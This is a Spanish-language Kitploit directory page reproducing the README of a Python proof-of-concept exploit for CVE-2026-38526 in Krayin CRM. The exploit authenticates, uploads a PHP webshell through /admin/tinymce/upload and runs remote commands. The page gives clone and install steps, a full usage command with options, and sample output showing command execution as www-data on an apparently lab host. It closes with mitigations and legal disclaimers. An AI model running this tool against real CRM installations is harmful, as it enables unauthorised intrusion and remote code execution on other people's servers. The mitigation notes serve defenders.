Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-38526 — PoC en Python que explota CVE-2026-38526 en Krayin CRM <= 2.2.x: se autentica, sube un webshell PHP a través de /admin/tinymce/upload y ejecuta comandos de forma remota. | Kitploit
Herramientas/GitHubGitHub/mrdark-ops/cve-2026-38526
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebCTFPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubmrdark-ops/cve-2026-38526

CVE-2026-38526

PoC en Python que explota CVE-2026-38526 en Krayin CRM <= 2.2.x: se autentica, sube un webshell PHP a través de /admin/tinymce/upload y ejecuta comandos de forma remota.

hace 2 díasAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-38526 — Krayin CRM ≤ 2.2.x RCE autenticado

⚠️ Aviso legal: este código se proporciona únicamente con fines educativos y para pruebas autorizadas (CTF, bug bounty, laboratorio privado). El autor no se hace responsable de un uso ilegal.

Descripción

Krayin CRM (Webkul) ≤ 2.2.x expone el endpoint /admin/tinymce/upload que permite a un usuario autenticado (incluso con privilegios bajos) subir archivos sin validación de extensión. El archivo es servido posteriormente desde la carpeta storage/, lo que permite la ejecución arbitraria de código PHP.

  • Tipo: Arbitrary File Upload → RCE
  • CVSS: 9.9 (Crítico)
  • Autenticación requerida: Sí (cualquier cuenta válida)

Instalación

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

Uso

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

Opciones:

OpciónDescripción
-t, --targetURL raíz del objetivo
-u, --userEmail de la cuenta Krayin
-p, --passwordContraseña
-c, --commandComando a ejecutar (por defecto: id)
--login-pathRuta de login (por defecto: /admin/login)
--upload-pathRuta de subida (por defecto: /admin/tinymce/upload)
--timeoutTimeout HTTP (por defecto: 15)

Ejemplo

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Obtención del token CSRF en http://billing.nexus.htb/admin/login
[*] Envío del formulario de login
[+] Autenticación exitosa
[*] Subida de x8f2k1ab.php vía http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accesible: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Ejecución: id

============================================================
[+] Comando: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Mitigación

  • Actualizar Krayin CRM a la versión corregida.
  • Restringir la extensión de los archivos subidos (whitelist).
  • Prohibir la ejecución de PHP en las carpetas storage/ y uploads/.
  • Aplicar el principio de mínimo privilegio en las cuentas CRM.

Disclaimer

Este proyecto se publica con fines de investigación en seguridad. Cualquier uso contra sistemas sin autorización escrita previa es ilegal y estrictamente prohibido.

Descargar herramienta